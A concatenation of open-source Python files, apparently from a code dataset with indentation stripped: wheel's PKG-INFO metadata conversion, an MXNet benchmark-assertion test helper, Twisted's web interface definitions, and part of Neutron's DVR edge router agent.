may_requires[key].append(package)
if may_requires:
metadata['run_requires'] = []
def sort_key(item):
# Both condition and extra could be None, which can't be compared
# against strings in Python 3.
key, value = item
if key.condition is None:
return ''
return key.condition
for key, value in sorted(may_requires.items(), key=sort_key):
may_requirement = OrderedDict((('requires', value),))
if key.extra:
may_requirement['extra'] = key.extra
if key.condition:
may_requirement['environment'] = key.condition
metadata['run_requires'].append(may_requirement)
if not 'extras' in metadata:
metadata['extras'] = []
metadata['extras'].extend([key.extra for key in may_requires.keys() if key.extra])
def pkginfo_to_dict(path, distribution=None):
"""
Convert PKG-INFO to a prototype Metadata 2.0 (PEP 426) dict.
The description is included under the key ['description'] rather than
being written to a separate file.
path: path to PKG-INFO file
distribution: optional distutils Distribution()
"""
metadata = OrderedDefaultDict(lambda: OrderedDefaultDict(lambda: OrderedDefaultDict(OrderedDict)))
metadata["generator"] = "bdist_wheel (" + wheel.__version__ + ")"
try:
unicode
pkg_info = read_pkg_info(path)
except NameError:
pkg_info = email.parser.Parser().parsestr(open(path, 'rb').read().decode('utf-8'))
description = None
if pkg_info['Summary']:
metadata['summary'] = pkginfo_unicode(pkg_info, 'Summary')
del pkg_info['Summary']
if pkg_info['Description']:
description = dedent_description(pkg_info)
del pkg_info['Description']
else:
payload = pkg_info.get_payload()
if isinstance(payload, bytes):
# Avoid a Python 2 Unicode error.
# We still suffer ? glyphs on Python 3.
payload = payload.decode('utf-8')
if payload:
description = payload
if description:
pkg_info['description'] = description
for key in sorted(unique(k.lower() for k in pkg_info.keys())):
low_key = key.replace('-', '_')
if low_key in SKIP_FIELDS:
continue
if low_key in UNKNOWN_FIELDS and pkg_info.get(key) == 'UNKNOWN':
continue
if low_key in sorted(PLURAL_FIELDS):
metadata[PLURAL_FIELDS[low_key]] = pkg_info.get_all(key)
elif low_key == "requires_dist":
handle_requires(metadata, pkg_info, key)
elif low_key == 'provides_extra':
if not 'extras' in metadata:
metadata['extras'] = []
metadata['extras'].extend(pkg_info.get_all(key))
elif low_key == 'home_page':
metadata['extensions']['python.details']['project_urls'] = {'Home':pkg_info[key]}
elif low_key == 'keywords':
metadata['keywords'] = KEYWORDS_RE.split(pkg_info[key])
else:
metadata[low_key] = pkg_info[key]
metadata['metadata_version'] = METADATA_VERSION
if 'extras' in metadata:
metadata['extras'] = sorted(set(metadata['extras']))
# include more information if distribution is available
if distribution:
for requires, attr in (('test_requires', 'tests_require'),):
try:
requirements = getattr(distribution, attr)
if isinstance(requirements, list):
new_requirements = sorted(convert_requirements(requirements))
metadata[requires] = [{'requires':new_requirements}]
except AttributeError:
pass
# handle contacts
contacts = []
for contact_type, role in CONTACT_FIELDS:
contact = OrderedDict()
for key in sorted(contact_type):
if contact_type[key] in metadata:
contact[key] = metadata.pop(contact_type[key])
if contact:
contact['role'] = role
contacts.append(contact)
if contacts:
metadata['extensions']['python.details']['contacts'] = contacts
# convert entry points to exports
try:
with open(os.path.join(os.path.dirname(path), "entry_points.txt"), "r") as ep_file:
ep_map = pkg_resources.EntryPoint.parse_map(ep_file.read())
exports = OrderedDict()
for group, items in sorted(ep_map.items()):
exports[group] = OrderedDict()
for item in sorted(map(str, items.values())):
name, export = item.split(' = ', 1)
exports[group][name] = export
if exports:
metadata['extensions']['python.exports'] = exports
except IOError:
pass
# copy console_scripts entry points to commands
if 'python.exports' in metadata['extensions']:
for (ep_script, wrap_script) in (('console_scripts', 'wrap_console'),
('gui_scripts', 'wrap_gui')):
if ep_script in metadata['extensions']['python.exports']:
metadata['extensions']['python.commands'][wrap_script] = \
metadata['extensions']['python.exports'][ep_script]
return metadata
def requires_to_requires_dist(requirement):
"""Compose the version predicates for requirement in PEP 345 fashion."""
requires_dist = []
for op, ver in requirement.specs:
requires_dist.append(op + ver)
if not requires_dist:
return ''
return " (%s)" % ','.join(requires_dist)
def convert_requirements(requirements):
"""Yield Requires-Dist: strings for parsed requirements strings."""
for req in requirements:
parsed_requirement = pkg_resources.Requirement.parse(req)
spec = requires_to_requires_dist(parsed_requirement)
extras = ",".join(parsed_requirement.extras)
if extras:
extras = "[%s]" % extras
yield (parsed_requirement.project_name + extras + spec)
def pkginfo_to_metadata(egg_info_path, pkginfo_path):
"""
Convert .egg-info directory with PKG-INFO to the Metadata 1.3 aka
old-draft Metadata 2.0 format.
"""
pkg_info = read_pkg_info(pkginfo_path)
pkg_info.replace_header('Metadata-Version', '2.0')
requires_path = os.path.join(egg_info_path, 'requires.txt')
if os.path.exists(requires_path):
requires = open(requires_path).read()
for extra, reqs in sorted(pkg_resources.split_sections(requires),
key=lambda x: x[0] or ''):
condition = ''
if extra and ':' in extra: # setuptools extra:condition syntax
extra, condition = extra.split(':', 1)
if extra:
pkg_info['Provides-Extra'] = extra
if condition:
condition += " and "
condition += 'extra == %s' % repr(extra)
if condition:
condition = '; ' + condition
for new_req in sorted(convert_requirements(reqs)):
pkg_info['Requires-Dist'] = new_req + condition
description = pkg_info['Description']
if description:
pkg_info.set_payload(dedent_description(pkg_info))
del pkg_info['Description']
return pkg_info
def pkginfo_unicode(pkg_info, field):
"""Hack to coax Unicode out of an email Message() - Python 3.3+"""
text = pkg_info[field]
field = field.lower()
if not isinstance(text, str):
if not hasattr(pkg_info, 'raw_items'): # Python 3.2
return str(text)
for item in pkg_info.raw_items():
if item[0].lower() == field:
text = item[1].encode('ascii', 'surrogateescape')\
.decode('utf-8')
break
return text
def dedent_description(pkg_info):
"""
Dedent and convert pkg_info['Description'] to Unicode.
"""
description = pkg_info['Description']
# Python 3 Unicode handling, sorta.
surrogates = False
if not isinstance(description, str):
surrogates = True
description = pkginfo_unicode(pkg_info, 'Description')
description_lines = description.splitlines()
description_dedent = '\n'.join(
# if the first line of long_description is blank,
# the first line here will be indented.
(description_lines[0].lstrip(),
textwrap.dedent('\n'.join(description_lines[1:])),
'\n'))
if surrogates:
description_dedent = description_dedent\
.encode("utf8")\
.decode("ascii", "surrogateescape")
return description_dedent
if __name__ == "__main__":
import sys, pprint
pprint.pprint(pkginfo_to_dict(sys.argv[1]))
| mit |
ykim362/mxnet | tests/nightly/mxnet_keras_integration_tests/assertion_util.py | 43 | 4800 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from nose.tools import assert_true
def assert_results(MACHINE_TYPE, IS_GPU, GPU_NUM, profile_output, CPU_BENCHMARK_RESULTS, GPU_1_BENCHMARK_RESULTS, GPU_2_BENCHMARK_RESULTS, GPU_4_BENCHMARK_RESULTS, GPU_8_BENCHMARK_RESULTS):
"""
Helps in asserting benchmarking results.
Compares actual output result in profile_output with expected result in
CPU_BENCHMARK_RESULTS if IS_GPU is True.
Else, compares with GPU_1_BENCHMARK_RESULTS, GPU_2_BENCHMARK_RESULTS
GPU_4_BENCHMARK_RESULTS and GPU_8_BENCHMARK_RESULTS.
Uses keys - MODEL, TRAINING_TIME, MEM_CONSUMPTION, TRAIN_ACCURACY and TEST_ACCURACY
to fetch data from provided actual and expected results input map stated above.
"""
# Model type
model = profile_output['MODEL']
# Actual values.
actual_training_time = profile_output['TRAINING_TIME']
actual_memory_consumption = profile_output['MEM_CONSUMPTION']
actual_train_accuracy = profile_output['TRAIN_ACCURACY']
actual_test_accuracy = profile_output['TEST_ACCURACY']
# Expected values
expected_training_time = 0.0
expected_memory_consumption = 0.0
expected_train_accuracy = 1.0
expected_test_accuracy = 1.0
# Set right set of expected values based on current run type
if(IS_GPU):
if GPU_NUM == 1:
expected_training_time = GPU_1_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = GPU_1_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = GPU_1_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = GPU_1_BENCHMARK_RESULTS['TEST_ACCURACY']
elif GPU_NUM == 2:
expected_training_time = GPU_2_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = GPU_2_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = GPU_2_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = GPU_2_BENCHMARK_RESULTS['TEST_ACCURACY']
elif GPU_NUM == 4:
expected_training_time = GPU_4_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = GPU_4_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = GPU_4_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = GPU_4_BENCHMARK_RESULTS['TEST_ACCURACY']
elif GPU_NUM == 8:
expected_training_time = GPU_8_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = GPU_8_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = GPU_8_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = GPU_8_BENCHMARK_RESULTS['TEST_ACCURACY']
else:
expected_training_time = CPU_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = CPU_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = CPU_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = CPU_BENCHMARK_RESULTS['TEST_ACCURACY']
# Validate Results
assert_true(actual_training_time < expected_training_time,'{0} on {1} machine with {2} GPU usage FAILED. Expected Training Time - {3} secs but was {4} secs.'.format(model, MACHINE_TYPE, GPU_NUM, expected_training_time, actual_training_time))
assert_true(actual_memory_consumption < expected_memory_consumption, '{0} on {1} machine with {2} GPU usage FAILED. Expected Mem Consumption - {3} MB but was {4} MB.'.format(model, MACHINE_TYPE, GPU_NUM, expected_memory_consumption, actual_memory_consumption))
assert_true(actual_train_accuracy > expected_train_accuracy, '{0} on {1} machine with {2} GPU usage FAILED. Expected Train Accuracy - {3} but was {4}.'.format(model, MACHINE_TYPE, GPU_NUM, expected_train_accuracy, actual_train_accuracy))
assert_true(actual_test_accuracy > expected_test_accuracy, '{0} on {1} machine with {2} GPU usage FAILED. Expected Test Accuracy - {3} but was {4}.'.format(model, MACHINE_TYPE, GPU_NUM, expected_test_accuracy, actual_test_accuracy))
| apache-2.0 |
lowitty/server | libsDarwin/twisted/web/iweb.py | 5 | 25674 | # -*- test-case-name: twisted.web.test -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Interface definitions for L{twisted.web}.
@var UNKNOWN_LENGTH: An opaque object which may be used as the value of
L{IBodyProducer.length} to indicate that the length of the entity
body is not known in advance.
"""
from zope.interface import Interface, Attribute
from twisted.internet.interfaces import IPushProducer
from twisted.cred.credentials import IUsernameDigestHash
class IRequest(Interface):
"""
An HTTP request.
@since: 9.0
"""
method = Attribute("A C{str} giving the HTTP method that was used.")
uri = Attribute(
"A C{str} giving the full encoded URI which was requested (including "
"query arguments).")
path = Attribute(
"A C{str} giving the encoded query path of the request URI.")
args = Attribute(
"A mapping of decoded query argument names as C{str} to "
"corresponding query argument values as C{list}s of C{str}. "
"For example, for a URI with C{'foo=bar&foo=baz&quux=spam'} "
"for its query part, C{args} will be C{{'foo': ['bar', 'baz'], "
"'quux': ['spam']}}.")
received_headers = Attribute(
"Backwards-compatibility access to C{requestHeaders}, deprecated in "
"Twisted 13.2.0. Use C{requestHeaders} instead. C{received_headers} "
"behaves mostly like a C{dict} and does not provide access to all "
"header values.")
requestHeaders = Attribute(
"A L{http_headers.Headers} instance giving all received HTTP request "
"headers.")
content = Attribute(
"A file-like object giving the request body. This may be a file on "
"disk, a C{StringIO}, or some other type. The implementation is free "
"to decide on a per-request basis.")
headers = Attribute(
"Backwards-compatibility access to C{responseHeaders}, deprecated in "
"Twisted 13.2.0. Use C{responseHeaders} instead. C{headers} behaves "
"mostly like a C{dict} and does not provide access to all header "
"values nor does it allow multiple values for one header to be set.")
responseHeaders = Attribute(
"A L{http_headers.Headers} instance holding all HTTP response "
"headers to be sent.")
def getHeader(key):
"""
Get an HTTP request header.
@type key: C{str}
@param key: The name of the header to get the value of.
@rtype: C{str} or C{NoneType}
@return: The value of the specified header, or C{None} if that header
was not present in the request.
"""
def getCookie(key):
"""
Get a cookie that was sent from the network.
"""
def getAllHeaders():
"""
Return dictionary mapping the names of all received headers to the last
value received for each.
Since this method does not return all header information,
C{requestHeaders.getAllRawHeaders()} may be preferred.
"""
def getRequestHostname():
"""
Get the hostname that the user passed in to the request.
This will either use the Host: header (if it is available) or the
host we are listening on if the header is unavailable.
@returns: the requested hostname
@rtype: C{str}
"""
def getHost():
"""
Get my originally requesting transport's host.
@return: An L{IAddress<twisted.internet.interfaces.IAddress>}.
"""
def getClientIP():
"""
Return the IP address of the client who submitted this request.
@returns: the client IP address or C{None} if the request was submitted
over a transport where IP addresses do not make sense.
@rtype: L{str} or C{NoneType}
"""
def getClient():
"""
Return the hostname of the IP address of the client who submitted this
request, if possible.
This method is B{deprecated}. See L{getClientIP} instead.
@rtype: C{NoneType} or L{str}
@return: The canonical hostname of the client, as determined by
performing a name lookup on the IP address of the client.
"""
def getUser():
"""
Return the HTTP user sent with this request, if any.
If no user was supplied, return the empty string.
@returns: the HTTP user, if any
@rtype: C{str}
"""
def getPassword():
"""
Return the HTTP password sent with this request, if any.
If no password was supplied, return the empty string.
@returns: the HTTP password, if any
@rtype: C{str}
"""
def isSecure():
"""
Return True if this request is using a secure transport.
Normally this method returns True if this request's HTTPChannel
instance is using a transport that implements ISSLTransport.
This will also return True if setHost() has been called
with ssl=True.
@returns: True if this request is secure
@rtype: C{bool}
"""
def getSession(sessionInterface=None):
"""
Look up the session associated with this request or create a new one if
there is not one.
@return: The L{Session} instance identified by the session cookie in
the request, or the C{sessionInterface} component of that session
if C{sessionInterface} is specified.
"""
def URLPath():
"""
@return: A L{URLPath} instance which identifies the URL for which this
request is.
"""
def prePathURL():
"""
@return: At any time during resource traversal, a L{str} giving an
absolute URL to the most nested resource which has yet been
reached.
"""
def rememberRootURL():
"""
Remember the currently-processed part of the URL for later
recalling.
"""
def getRootURL():
"""
Get a previously-remembered URL.
"""
# Methods for outgoing response
def finish():
"""
Indicate that the response to this request is complete.
"""
def write(data):
"""
Write some data to the body of the response to this request. Response
headers are written the first time this method is called, after which
new response headers may not be added.
"""
def addCookie(k, v, expires=None, domain=None, path=None, max_age=None, comment=None, secure=None):
"""
Set an outgoing HTTP cookie.
In general, you should consider using sessions instead of cookies, see
L{twisted.web.server.Request.getSession} and the
L{twisted.web.server.Session} class for details.
"""
def setResponseCode(code, message=None):
"""
Set the HTTP response code.
"""
def setHeader(k, v):
"""
Set an HTTP response header. Overrides any previously set values for
this header.
@type name: C{str}
@param name: The name of the header for which to set the value.
@type value: C{str}
@param value: The value to set for the named header.
"""
def redirect(url):
"""
Utility function that does a redirect.
The request should have finish() called after this.
"""
def setLastModified(when):
"""
Set the C{Last-Modified} time for the response to this request.
If I am called more than once, I ignore attempts to set Last-Modified
earlier, only replacing the Last-Modified time if it is to a later
value.
If I am a conditional request, I may modify my response code to
L{NOT_MODIFIED<http.NOT_MODIFIED>} if appropriate for the time given.
@param when: The last time the resource being returned was modified, in
seconds since the epoch.
@type when: L{int}, L{long} or L{float}
@return: If I am a C{If-Modified-Since} conditional request and the time
given is not newer than the condition, I return
L{CACHED<http.CACHED>} to indicate that you should write no body.
Otherwise, I return a false value.
"""
def setETag(etag):
"""
Set an C{entity tag} for the outgoing response.
That's "entity tag" as in the HTTP/1.1 I{ETag} header, "used for
comparing two or more entities from the same requested resource."
If I am a conditional request, I may modify my response code to
L{NOT_MODIFIED<http.NOT_MODIFIED>} or
L{PRECONDITION_FAILED<http.PRECONDITION_FAILED>}, if appropriate for the
tag given.
@param etag: The entity tag for the resource being returned.
@type etag: C{str}
@return: If I am a C{If-None-Match} conditional request and the tag
matches one in the request, I return L{CACHED<http.CACHED>} to
indicate that you should write no body. Otherwise, I return a
false value.
"""
def setHost(host, port, ssl=0):
"""
Change the host and port the request thinks it's using.
This method is useful for working with reverse HTTP proxies (e.g. both
Squid and Apache's mod_proxy can do this), when the address the HTTP
client is using is different than the one we're listening on.
For example, Apache may be listening on https://www.example.com, and
then forwarding requests to http://localhost:8080, but we don't want
HTML produced by Twisted to say 'http://localhost:8080', they should
say 'https://www.example.com', so we do::
request.setHost('www.example.com', 443, ssl=1)
"""
class IAccessLogFormatter(Interface):
"""
An object which can represent an HTTP request as a line of text for
inclusion in an access log file.
"""
def __call__(timestamp, request):
"""
Generate a line for the access log.
@param timestamp: The time at which the request was completed in the
standard format for access logs.
@type timestamp: L{unicode}
@param request: The request object about which to log.
@type request: L{twisted.web.server.Request}
@return: One line describing the request without a trailing newline.
@rtype: L{unicode}
"""
class ICredentialFactory(Interface):
"""
A credential factory defines a way to generate a particular kind of
authentication challenge and a way to interpret the responses to these
challenges. It creates
L{ICredentials<twisted.cred.credentials.ICredentials>} providers from
responses. These objects will be used with L{twisted.cred} to authenticate
an authorize requests.
"""
scheme = Attribute(
"A C{str} giving the name of the authentication scheme with which "
"this factory is associated. For example, C{'basic'} or C{'digest'}.")
def getChallenge(request):
"""
Generate a new challenge to be sent to a client.
@type peer: L{twisted.web.http.Request}
@param peer: The request the response to which this challenge will be
included.
@rtype: C{dict}
@return: A mapping from C{str} challenge fields to associated C{str}
values.
"""
def decode(response, request):
"""
Create a credentials object from the given response.
@type response: C{str}
@param response: scheme specific response string
@type request: L{twisted.web.http.Request}
@param request: The request being processed (from which the response
was taken).
@raise twisted.cred.error.LoginFailed: If the response is invalid.
@rtype: L{twisted.cred.credentials.ICredentials} provider
@return: The credentials represented by the given response.
"""
class IBodyProducer(IPushProducer):
"""
Objects which provide L{IBodyProducer} write bytes to an object which
provides L{IConsumer<twisted.internet.interfaces.IConsumer>} by calling its
C{write} method repeatedly.
L{IBodyProducer} providers may start producing as soon as they have an
L{IConsumer<twisted.internet.interfaces.IConsumer>} provider. That is, they
should not wait for a C{resumeProducing} call to begin writing data.
L{IConsumer.unregisterProducer<twisted.internet.interfaces.IConsumer.unregisterProducer>}
must not be called. Instead, the
L{Deferred<twisted.internet.defer.Deferred>} returned from C{startProducing}
must be fired when all bytes have been written.
L{IConsumer.write<twisted.internet.interfaces.IConsumer.write>} may
synchronously invoke any of C{pauseProducing}, C{resumeProducing}, or
C{stopProducing}. These methods must be implemented with this in mind.
@since: 9.0
"""
# Despite the restrictions above and the additional requirements of
# stopProducing documented below, this interface still needs to be an
# IPushProducer subclass. Providers of it will be passed to IConsumer
# providers which only know about IPushProducer and IPullProducer, not
# about this interface. This interface needs to remain close enough to one
# of those interfaces for consumers to work with it.
length = Attribute(
"""
C{length} is a C{int} indicating how many bytes in total this
L{IBodyProducer} will write to the consumer or L{UNKNOWN_LENGTH}
if this is not known in advance.
""")
def startProducing(consumer):
"""
Start producing to the given
L{IConsumer<twisted.internet.interfaces.IConsumer>} provider.
@return: A L{Deferred<twisted.internet.defer.Deferred>} which fires with
C{None} when all bytes have been produced or with a
L{Failure<twisted.python.failure.Failure>} if there is any problem
before all bytes have been produced.
"""
def stopProducing():
"""
In addition to the standard behavior of
L{IProducer.stopProducing<twisted.internet.interfaces.IProducer.stopProducing>}
(stop producing data), make sure the
L{Deferred<twisted.internet.defer.Deferred>} returned by
C{startProducing} is never fired.
"""
class IRenderable(Interface):
"""
An L{IRenderable} is an object that may be rendered by the
L{twisted.web.template} templating system.
"""
def lookupRenderMethod(name):
"""
Look up and return the render method associated with the given name.
@type name: C{str}
@param name: The value of a render directive encountered in the
document returned by a call to L{IRenderable.render}.
@return: A two-argument callable which will be invoked with the request
being responded to and the tag object on which the render directive
was encountered.
"""
def render(request):
"""
Get the document for this L{IRenderable}.
@type request: L{IRequest} provider or C{NoneType}
@param request: The request in response to which this method is being
invoked.
@return: An object which can be flattened.
"""
class ITemplateLoader(Interface):
"""
A loader for templates; something usable as a value for
L{twisted.web.template.Element}'s C{loader} attribute.
"""
def load():
"""
Load a template suitable for rendering.
@return: a C{list} of C{list}s, C{unicode} objects, C{Element}s and
other L{IRenderable} providers.
"""
class IResponse(Interface):
"""
An object representing an HTTP response received from an HTTP server.
@since: 11.1
"""
version = Attribute(
"A three-tuple describing the protocol and protocol version "
"of the response. The first element is of type C{str}, the second "
"and third are of type C{int}. For example, C{('HTTP', 1, 1)}.")
code = Attribute("The HTTP status code of this response, as a C{int}.")
phrase = Attribute(
"The HTTP reason phrase of this response, as a C{str}.")
headers = Attribute("The HTTP response L{Headers} of this response.")
length = Attribute(
"The C{int} number of bytes expected to be in the body of this "
"response or L{UNKNOWN_LENGTH} if the server did not indicate how "
"many bytes to expect. For I{HEAD} responses, this will be 0; if "
"the response includes a I{Content-Length} header, it will be "
"available in C{headers}.")
request = Attribute(
"The L{IClientRequest} that resulted in this response.")
previousResponse = Attribute(
"The previous L{IResponse} from a redirect, or C{None} if there was no "
"previous response. This can be used to walk the response or request "
"history for redirections.")
def deliverBody(protocol):
"""
Register an L{IProtocol<twisted.internet.interfaces.IProtocol>} provider
to receive the response body.
The protocol will be connected to a transport which provides
L{IPushProducer}. The protocol's C{connectionLost} method will be
called with:
- ResponseDone, which indicates that all bytes from the response
have been successfully delivered.
- PotentialDataLoss, which indicates that it cannot be determined
if the entire response body has been delivered. This only occurs
when making requests to HTTP servers which do not set
I{Content-Length} or a I{Transfer-Encoding} in the response.
- ResponseFailed, which indicates that some bytes from the response
were lost. The C{reasons} attribute of the exception may provide
more specific indications as to why.
"""
def setPreviousResponse(response):
"""
Set the reference to the previous L{IResponse}.
The value of the previous response can be read via
L{IResponse.previousResponse}.
"""
class _IRequestEncoder(Interface):
"""
An object encoding data passed to L{IRequest.write}, for example for
compression purpose.
@since: 12.3
"""
def encode(data):
"""
Encode the data given and return the result.
@param data: The content to encode.
@type data: C{str}
@return: The encoded data.
@rtype: C{str}
"""
def finish():
"""
Callback called when the request is closing.
@return: If necessary, the pending data accumulated from previous
C{encode} calls.
@rtype: C{str}
"""
class _IRequestEncoderFactory(Interface):
"""
A factory for returing L{_IRequestEncoder} instances.
@since: 12.3
"""
def encoderForRequest(request):
"""
If applicable, returns a L{_IRequestEncoder} instance which will encode
the request.
"""
class IClientRequest(Interface):
"""
An object representing an HTTP request to make to an HTTP server.
@since: 13.1
"""
method = Attribute(
"The HTTP method for this request, as L{bytes}. For example: "
"C{b'GET'}, C{b'HEAD'}, C{b'POST'}, etc.")
absoluteURI = Attribute(
"The absolute URI of the requested resource, as L{bytes}; or C{None} "
"if the absolute URI cannot be determined.")
headers = Attribute(
"Headers to be sent to the server, as "
"a L{twisted.web.http_headers.Headers} instance.")
class IAgent(Interface):
"""
An agent makes HTTP requests.
The way in which requests are issued is left up to each implementation.
Some may issue them directly to the server indicated by the net location
portion of the request URL. Others may use a proxy specified by system
configuration.
Processing of responses is also left very widely specified. An
implementation may perform no special handling of responses, or it may
implement redirect following or content negotiation, it may implement a
cookie store or automatically respond to authentication challenges. It may
implement many other unforeseen behaviors as well.
It is also intended that L{IAgent} implementations be composable. An
implementation which provides cookie handling features should re-use an
implementation that provides connection pooling and this combination could
be used by an implementation which adds content negotiation functionality.
Some implementations will be completely self-contained, such as those which
actually perform the network operations to send and receive requests, but
most or all other implementations should implement a small number of new
features (perhaps one new feature) and delegate the rest of the
request/response machinery to another implementation.
This allows for great flexibility in the behavior an L{IAgent} will
provide. For example, an L{IAgent} with web browser-like behavior could be
obtained by combining a number of (hypothetical) implementations::
baseAgent = Agent(reactor)
redirect = BrowserLikeRedirectAgent(baseAgent, limit=10)
authenticate = AuthenticateAgent(
redirect, [diskStore.credentials, GtkAuthInterface()])
cookie = CookieAgent(authenticate, diskStore.cookie)
decode = ContentDecoderAgent(cookie, [(b"gzip", GzipDecoder())])
cache = CacheAgent(decode, diskStore.cache)
doSomeRequests(cache)
"""
def request(method, uri, headers=None, bodyProducer=None):
"""
Request the resource at the given location.
@param method: The request method to use, such as C{"GET"}, C{"HEAD"},
C{"PUT"}, C{"POST"}, etc.
@type method: L{bytes}
@param uri: The location of the resource to request. This should be an
absolute URI but some implementations may support relative URIs
(with absolute or relative paths). I{HTTP} and I{HTTPS} are the
schemes most likely to be supported but others may be as well.
@type uri: L{bytes}
@param headers: The headers to send with the request (or C{None} to
send no extra headers). An implementation may add its own headers
to this (for example for client identification or content
negotiation).
@type headers: L{Headers} or L{NoneType}
@param bodyProducer: An object which can generate bytes to make up the
body of this request (for example, the properly encoded contents of
a file for a file upload). Or, C{None} if the request is to have
no body.
@type bodyProducer: L{IBodyProducer} provider
@return: A L{Deferred} that fires with an L{IResponse} provider when
the header of the response has been received (regardless of the
response status code) or with a L{Failure} if there is any problem
which prevents that response from being received (including
problems that prevent the request from being sent).
@rtype: L{Deferred}
"""
class IPolicyForHTTPS(Interface):
"""
An L{IPolicyForHTTPS} provides a policy for verifying the certificates of
HTTPS connections, in the form of a L{client connection creator
<twisted.internet.interfaces.IOpenSSLClientConnectionCreator>} per network
location.
@since: 14.0
"""
def creatorForNetloc(hostname, port):
"""
Create a L{client connection creator
<twisted.internet.interfaces.IOpenSSLClientConnectionCreator>}
appropriate for the given URL "netloc"; i.e. hostname and port number
pair.
@param hostname: The name of the requested remote host.
@type hostname: L{bytes}
@param port: The number of the requested remote port.
@type port: L{int}
@return: A client connection creator expressing the security
requirements for the given remote host.
@rtype: L{client connection creator
<twisted.internet.interfaces.IOpenSSLClientConnectionCreator>}
"""
class IAgentEndpointFactory(Interface):
"""
An L{IAgentEndpointFactory} provides a way of constructing an endpoint
used for outgoing Agent requests. This is useful in the case of needing to
proxy outgoing connections, or to otherwise vary the transport used.
@since: 15.0
"""
def endpointForURI(uri):
"""
Construct and return an L{IStreamClientEndpoint} for the outgoing
request's connection.
@param uri: The URI of the request.
@type uri: L{twisted.web.client.URI}
@return: An endpoint which will have its C{connect} method called to
issue the request.
@rtype: an L{IStreamClientEndpoint} provider
@raises twisted.internet.error.SchemeNotSupported: If the given
URI's scheme cannot be handled by this factory.
"""
UNKNOWN_LENGTH = u"twisted.web.iweb.UNKNOWN_LENGTH"
__all__ = [
"IUsernameDigestHash", "ICredentialFactory", "IRequest",
"IBodyProducer", "IRenderable", "IResponse", "_IRequestEncoder",
"_IRequestEncoderFactory", "IClientRequest",
"UNKNOWN_LENGTH"]
| mit |
jacknjzhou/neutron | neutron/agent/l3/dvr_edge_router.py | 7 | 6950 | # Copyright (c) 2015 Openstack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from neutron.agent.l3 import dvr_local_router
from neutron.agent.l3 import dvr_snat_ns
from neutron.agent.l3 import router_info as router
from neutron.agent.linux import ip_lib
from neutron.agent.linux import iptables_manager
LOG = logging.getLogger(__name__)
class DvrEdgeRouter(dvr_local_router.DvrLocalRouter):
def __init__(self, agent, host, *args, **kwargs):
super(DvrEdgeRouter, self).__init__(agent, host, *args, **kwargs)
self.snat_namespace = None
self.snat_iptables_manager = None
def external_gateway_added(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self).external_gateway_added(
ex_gw_port, interface_name)
if self._is_this_snat_host():
self._create_dvr_gateway(ex_gw_port, interface_name)
def external_gateway_updated(self, ex_gw_port, interface_name):
if not self._is_this_snat_host():
# no centralized SNAT gateway for this node/agent
LOG.debug("not hosting snat for router: %s", self.router['id'])
return
self._external_gateway_added(ex_gw_port,
interface_name,
self.snat_namespace.name,
preserve_ips=[])
def external_gateway_removed(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self).external_gateway_removed(ex_gw_port,
interface_name)
if not self._is_this_snat_host():
# no centralized SNAT gateway for this node/agent
LOG.debug("not hosting snat for router: %s", self.router['id'])
return
self.driver.unplug(interface_name,
bridge=self.agent_conf.external_network_bridge,
namespace=self.snat_namespace.name,
prefix=router.EXTERNAL_DEV_PREFIX)
self.snat_namespace.delete()
self.snat_namespace = None
def internal_network_added(self, port):
super(DvrEdgeRouter, self).internal_network_added(port)
# TODO(gsagie) some of this checks are already implemented
# in the base class, think how to avoid re-doing them
if not self._is_this_snat_host():
return
sn_port = self.get_snat_port_for_internal_port(port)
if not sn_port:
return
ns_name = dvr_snat_ns.SnatNamespace.get_snat_ns_name(self.router['id'])
interface_name = self.get_snat_int_device_name(sn_port['id'])
self._internal_network_added(
ns_name,
sn_port['network_id'],
sn_port['id'],
sn_port['fixed_ips'],
sn_port['mac_address'],
interface_name,
dvr_snat_ns.SNAT_INT_DEV_PREFIX)
def _dvr_internal_network_removed(self, port):
super(DvrEdgeRouter, self)._dvr_internal_network_removed(port)
if not self.ex_gw_port:
return
sn_port = self.get_snat_port_for_internal_port(port)
if not sn_port:
return
is_this_snat_host = ('binding:host_id' in self.ex_gw_port) and (
self.ex_gw_port['binding:host_id'] == self.host)
if not is_this_snat_host:
return
snat_interface = self.get_snat_int_device_name(sn_port['id'])
ns_name = self.snat_namespace.name
prefix = dvr_snat_ns.SNAT_INT_DEV_PREFIX
if ip_lib.device_exists(snat_interface, namespace=ns_name):
self.driver.unplug(snat_interface, namespace=ns_name,
prefix=prefix)
